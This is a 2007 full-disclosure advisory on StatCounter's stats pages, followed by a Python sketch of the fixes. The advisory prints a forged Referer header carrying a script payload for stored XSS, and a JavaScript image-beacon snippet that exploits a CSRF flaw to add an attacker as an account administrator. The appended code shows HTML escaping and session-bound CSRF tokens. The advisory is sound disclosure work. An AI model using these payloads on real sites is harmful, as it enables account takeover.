1. DESCRIPTION OF THE SOFTWARE

StatCounter.com is a free yet reliable invisible web tracker, highly configurable hit counter as well as a real-time detailed web stats tool. Insert a simple piece of our code on your web page or blog and you will be able to analyse and monitor all the visitors to your website in real-time! [from statcounter.com]
2. DESCRIPTION OF THE VULNERABILITY

The referrer field is taken from the Referer HTTP header, which is generated by the user's browser. It is therefore user input and can be tampered with.

This is a snippet of the code taken from the "Came From" section of the statistics page on statcounter.com:

    ...
    <img src="http://www.statcounter.com/images/drill_down.gif" alt="drill down" border="0"></a></td><td class="tableContent1Right">1</td><td class="tableContent1Left"><a href="http://www.google.it/?q=stat+counter" target="_blank">www.google.it/?q=stat+counter</a></td></tr>
    ...

If an attacker creates an HTTP request with this header, an alert box will be displayed when the blogger reads his stats:

    Referer: http://www.domain.it"></a><script>alert("XSS")</script><a href="

On the stats page this HTML code will be written:

    ...
    <img src="http://www.statcounter.com/images/drill_down.gif" alt="drill down" border="0"></a></td><td class="tableContent1Right">1</td><td class="tableContent1Left"><a href="http://www.domain.it"></a><script>alert("XSS")</script><a href="" target="_blank">http://www.domain.it"></a><script>alert("XSS")</script><a href="</a></td></tr>
    ...

3. ANALYSIS

An attacker could forge the HTTP Referer header so as to inject JavaScript code into it, creating a persistent Cross-Site Scripting (XSS). To exploit this vulnerability, an attacker can simply request a page monitored by the StatCounter script and send a specially crafted HTTP header.

Besides the XSS bug, there is also another one: in the "user" page of the personal account area it is possible to add a new user to the statistics page. The page that receives the parameters (/user/add.php) does not use any validation code to prevent CSRF (Cross-Site Request Forgery).
So, in this case, it is possible to carry out the CSRF with a simple piece of JS code injected into the Referer HTTP header, like this:

    <SCRIPT>
    var img = new Image();
    img.src = 'http://'+document.domain+'/users/add.php?postback=1&username=MyUserName&etc...'; //this is not all parameters needed
    </SCRIPT>

Note that the original form method is POST, but the PHP page retrieves the parameters with $_REQUEST, and "document.domain" is necessary because StatCounter uses a different web server for load balancing. In this way an attacker can silently add himself/herself, with administrative privileges, to the statistics panel of a compromised account, and he/she can then execute some JavaScript code. No user interaction is needed.

4. IMPACT

The impact of this vulnerability is HIGH for the integrity of StatCounter customer accounts.

5. TIME LINE

05/07/2007 - Vendor contacted
16/07/2007 - Vendor solved XSS bug
17/07/2007 - Vendor working on CSRF bug
23/07/2007 - PUBLIC DISCLOSURE

--
Matteo Carli [EMAIL PROTECTED] | web: www.matteocarli.com
GPG keyID: 0xD20BA70A | GnuPG key server: pgp.mit.edu

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
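Defender's view of the two bugs described in sections 2 and 3, added here as an example that is not part of the advisory and not StatCounter's code (the real pages are PHP; this is a Python sketch of the same two fixes). It shows, first, the Referer value being HTML-entity encoded before it is written into the "Came From" table, so the advisory's payload can no longer close the href attribute or open a <script> element, and second, the add-user action accepting only a POST body that carries a per-session CSRF token, instead of reading any parameter from the query string the way a $_REQUEST lookup does, so an injected image beacon cannot trigger it. The Request class, the function names and the CRAFTED_REFERER sample (copied from the advisory's payload shape) are constructed for the illustration.

```python
import hmac
import html
import secrets
from dataclasses import dataclass, field

# Constructed sample: the Referer value from the advisory's proof of concept.
CRAFTED_REFERER = 'http://www.domain.it"></a><script>alert("XSS")</script><a href="'


def render_came_from_cell(referrer: str) -> str:
    """Render one "Came From" cell so the referrer can only ever be data.

    html.escape(quote=True) turns <, >, &, " and ' into entities, so the
    value cannot terminate the href attribute or start a <script> element.
    Only absolute http(s) values are turned into a link; anything else
    (including javascript: URLs) is shown as plain text.
    """
    escaped = html.escape(referrer, quote=True)
    if referrer.lower().startswith(("http://", "https://")):
        return ('<td class="tableContent1Left">'
                f'<a href="{escaped}" target="_blank">{escaped}</a></td>')
    return f'<td class="tableContent1Left">{escaped}</td>'


@dataclass
class Request:
    """Minimal stand-in for an HTTP request (hypothetical, for this example)."""
    method: str
    query: dict = field(default_factory=dict)  # URL parameters (GET)
    form: dict = field(default_factory=dict)   # request body (POST)


def make_csrf_token() -> str:
    """Per-session secret, embedded as a hidden field in the add-user form."""
    return secrets.token_urlsafe(32)


def add_user_allowed(req: Request, session_token: str) -> bool:
    """Gate the state-changing add-user action.

    Unlike a $_REQUEST lookup, only the POST body is consulted, so a GET
    fired by an injected <img src=...> beacon never reaches the action, and
    the body must carry the token stored in the victim's session.
    """
    if req.method != "POST":
        return False
    submitted = req.form.get("csrf_token", "")
    return hmac.compare_digest(submitted.encode(), session_token.encode())


if __name__ == "__main__":
    print(render_came_from_cell("http://www.google.it/?q=stat+counter"))
    print(render_came_from_cell(CRAFTED_REFERER))
    token = make_csrf_token()
    beacon = Request("GET", query={"postback": "1", "username": "MyUserName"})
    print("beacon accepted:", add_user_allowed(beacon, token))
    real = Request("POST", form={"username": "MyUserName", "csrf_token": token})
    print("form accepted:", add_user_allowed(real, token))
```

Encoding at the point where the value is written into HTML is what removes the XSS; rejecting the Referer header at ingestion would not help, since the same value can reach the page through other stored fields. For the CSRF fix, binding the token to the session and comparing it in constant time is the part that matters; requiring POST on its own only stops the image-beacon shape shown in the advisory.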